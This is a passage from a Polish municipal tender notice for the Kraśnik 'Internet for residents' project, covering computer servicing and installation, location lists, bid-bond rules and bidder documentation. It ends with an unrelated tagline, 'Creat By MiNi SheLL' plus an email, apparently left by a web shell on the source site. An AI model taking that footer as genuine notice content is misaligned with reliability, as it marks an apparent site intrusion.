Przedmiot zamówienia obejmuje swoim zakresem obsługę serwisową (maintenance) poza zakresem usługi objętej gwarancją producenta dla 97 komputerów. Usługa polegać będzie na wymianie w ostatnim kwartale wdrażania projektu tj. od 1.08.2014 r. do 31.10.2014 r. podzespołów: Procesor i/lub Chipset i/lub Płytę główną oraz zwiększy Pamięć w 97 komputerach w celu zwiększenia wydajności komputerów.

2. Serwis:
1)	3 - letnia gwarancja usługobiorcy świadczona na miejscu u klienta;
2)	gwarancja obejmuje wymianę wadliwego podzespołu na wolny od wad bądź naprawę uszkodzonego podzespołu i udostępnienie na czas naprawy sprzętu zastępczego o równorzędnych parametrach;
3)	uprawnienia wynikające z gwarancji będą realizowane w siedzibie Zamawiającego;
4)	możliwość zgłaszania awarii w dni robocze w godzinach: od 8:00 do 16:00, telefonicznie, za pomocą faksu i poprzez pocztę elektroniczną;
5)	czas przyjęcia zgłoszenia od Zamawiającego, dotyczącego konieczności usunięcia awarii (usterki) - do końca następnego dnia roboczego;
6)	w przypadku braku możliwości naprawy sprzętu w terminie 5 dni roboczych od dnia zgłoszenia podstawienie sprzętu zastępczego o parametrach równoważnych lub wyższych;
7)	w przypadku wycofania z produkcji zaoferowanego przez Wykonawcę podzespołu, Zamawiający dopuszcza możliwość zamiany przez Wykonawcę modelu zaoferowanego podzespołu, na podzespół o parametrach równoważnych lub wyższych.

Pakiet 6 - Świadczenie usługi instalacji oraz pierwszej konfiguracji 97 komputerów w miejscach ich użytkowania - 65 adresów na terenie Gminy Miasta Kraśnik oraz w 10 lokalach Jednostek podległych 


1.	Wymagania ogólne:
Przedmiot zamówienia obejmuje swoim zakresem Świadczenie usługi instalacji oraz pierwszej konfiguracji 97 komputerów w miejscach ich użytkowania - 65 komputerów  pod 65 adresami na terenie Gminy Miasta Kraśnik oraz 32 komputerów w 10 lokalach Jednostek podległych

2. Lista lokalizacji:
Lista lokalizacji zostanie przekazana Wykonawcy po zakończeniu rekrutacji Beneficjentów Ostatecznych projektu. Adresy lokalizacji będą zawierać się w granicach administracyjnych Gminy Miasta Kraśnik oraz w 10 jednostkach podległych Urzędowi Miasta Kraśnik:
Lp	Nazwa	Adres
1	Zespół Placówek Oświatowych Nr 1 w Kraśniku	 ul. Kościuszki 23; 23-200 Kraśnik
2	Zespół Placówek Oświatowych Nr 2 w Kraśniku	 ul. Lubelska 10; 23-200 Kraśnik
3	Szkoła Podstawowa Nr 3 w Kraśniku	 ul. Urzędowska 435; 23-200 Kraśnik
4	Szkoła Podstawowa Nr 4 w Kraśniku	 ul. Kolejowa 28; 23-200 Kraśnik
5	Szkoła Podstawowa Nr 5 w Kraśniku	 Al. Niepodległości 54; 23-210 Kraśnik
6	Szkoła Podstawowa Nr 6 w Kraśniku	 ul. Grunwaldzka 2; 23-210 Kraśnik
7	Publiczne Gimnazjum Nr 1 w Kraśniku	 ul. Ks. J. Popiełuszki 1; 23-210 Kraśnik
8	Miejska Biblioteka Publiczna w Kraśniku	 ul. Koszarowa 10a; 23-200 Kraśnik
9	Centrum Kultury i Promocji w Kraśniku	 Al. Niepodległości 44; 23-210 Kraśnik
10	Miejski Ośrodek Pomocy Społecznej w Kraśniku	 ul. Grunwaldzka 4a; 23-210 Kraśnik.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.50.00.00-0, 48.21.00.00-3, 32.41.21.10-8, 32.32.20.00-6, 30.20.00.00-1, 30.21.33.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości
-  10 000,00 zł (słownie: dziesięć tysięcy złotych), 
które może być wnoszone w:
-	 pieniądzu,
-	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
-	 poręczeniach i gwarancjach bankowych,
-	 gwarancjach ubezpieczeniowych,
-	 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. z 2007r. Nr 42, poz. 275 z późn. zm.)
2.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Polska Kasa Opieki S.A. nr 46 1240 5497 1111 0010 4019 7424. 
3.	Jeżeli wadium zostanie wniesione w pieniądzu przelewem, wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. W tytule przelewu należy wpisać: wadium - przetarg na: Internet dla mieszkańców Kraśnika 
4.	Za wyjątkiem wadium wniesionego w pieniądzu, wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, 
o których mowa muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
5.	Wadium musi być wniesione przed upływem terminu składania ofert, tj. do 17.01.2012 r. do godz. 11:00 (liczy się data wpływu środków na rachunek bankowy Zamawiającego).
6.	Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
7.	Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest niezgodna z rozdziałem XII pkt 1 SIWZ - są wykluczeni.
8.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych dokumentów, oświadczeń lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niezależnych od niego.
13.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14.	Wykonawca traci wadium na rzecz zamawiającego, jeżeli:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniesie zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 3 do SIWZ oraz wpis do właściwego rejestru przedsiębiorców telekomunikacyjnych albo posiadanie wpisu do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie wykazu usług i dostaw (załącznik nr 8 do SIWZ) wykonanych w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali:
- co najmniej 2 dostawy komputerów stacjonarnych wraz z instalacją  i konfiguracją  o wartości minimum  150 tys. brutto każda oraz co najmniej 2 usługi dostępu do Internetu dla co najmniej 60 odbiorców końcowych jednocześnie o wartości minimum 50 tys. brutto każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia oceniony zostanie na podstawie oświadczenia (zał. nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia (zał. nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy potwierdzające, że serwis dostarczonych w ramach pakietu nr 1 i nr 4 komputerów i tablic multimedialnych będzie realizowany przez producenta lub autoryzowanego partnera serwisowego producenta, stanowiące załącznik nr 7 do specyfikacji istotnych warunków zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie postanowienia, które zostaną wprowadzone do treści umowy oraz wysokość kar umownych z tytułu niewykonania lub nienależytego wykonania umowy zawarte są we wzorach umów, stanowiących załącznik nr 6 i 7 do niniejszej specyfikacji istotnych warunków zamówienia.
2.	Zamawiający dopuszcza możliwość wprowadzania zmian w umowie, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
3.	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadku wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
4.	zmiany osób, przy pomocy których Wykonawca i Zamawiający realizuje przedmiot umowy, na inne osoby spełniające warunki określone w niniejszej specyfikacji istotnych warunków zamówienia,
5.	zmiana sposobu rozliczania umowy w sprawie zamówienia publicznego lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy              o dofinansowanie projektu lub wytycznych dotyczących realizacji Projektu. Zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionej umowy                                    o dofinansowanie projektu lub nowych wytycznych dotyczących realizacji projektu, zmiany adresu gospodarstwa domowego, będącego Beneficjentem końcowym Projektu, na adres poza granicami administracyjnymi Gminy Miasto Kraśnik, lub braku technicznych możliwości świadczenia usługi dostępu do Internetu pod nowym adresem.
6.	Zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności takiej zmiany.
7.	Z wnioskiem o zmianę niniejszej umowy może wystąpić każda ze stron niniejszej umowy.
8.	Wniosek, o którym mowa w treści pkt XV ppkt 4 niniejszej specyfikacji istotnych warunków zamówienia, wymaga formy pisemnej oraz uzasadnienia.
9.	Wszelkie zmiany zawartej umowy wymagają uzyskania akceptacji Instytucji Współfinansującej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.krasnik.eu/index.php?id=39<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
p.321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2012 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Internet dla mieszkańców Kraśnika jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com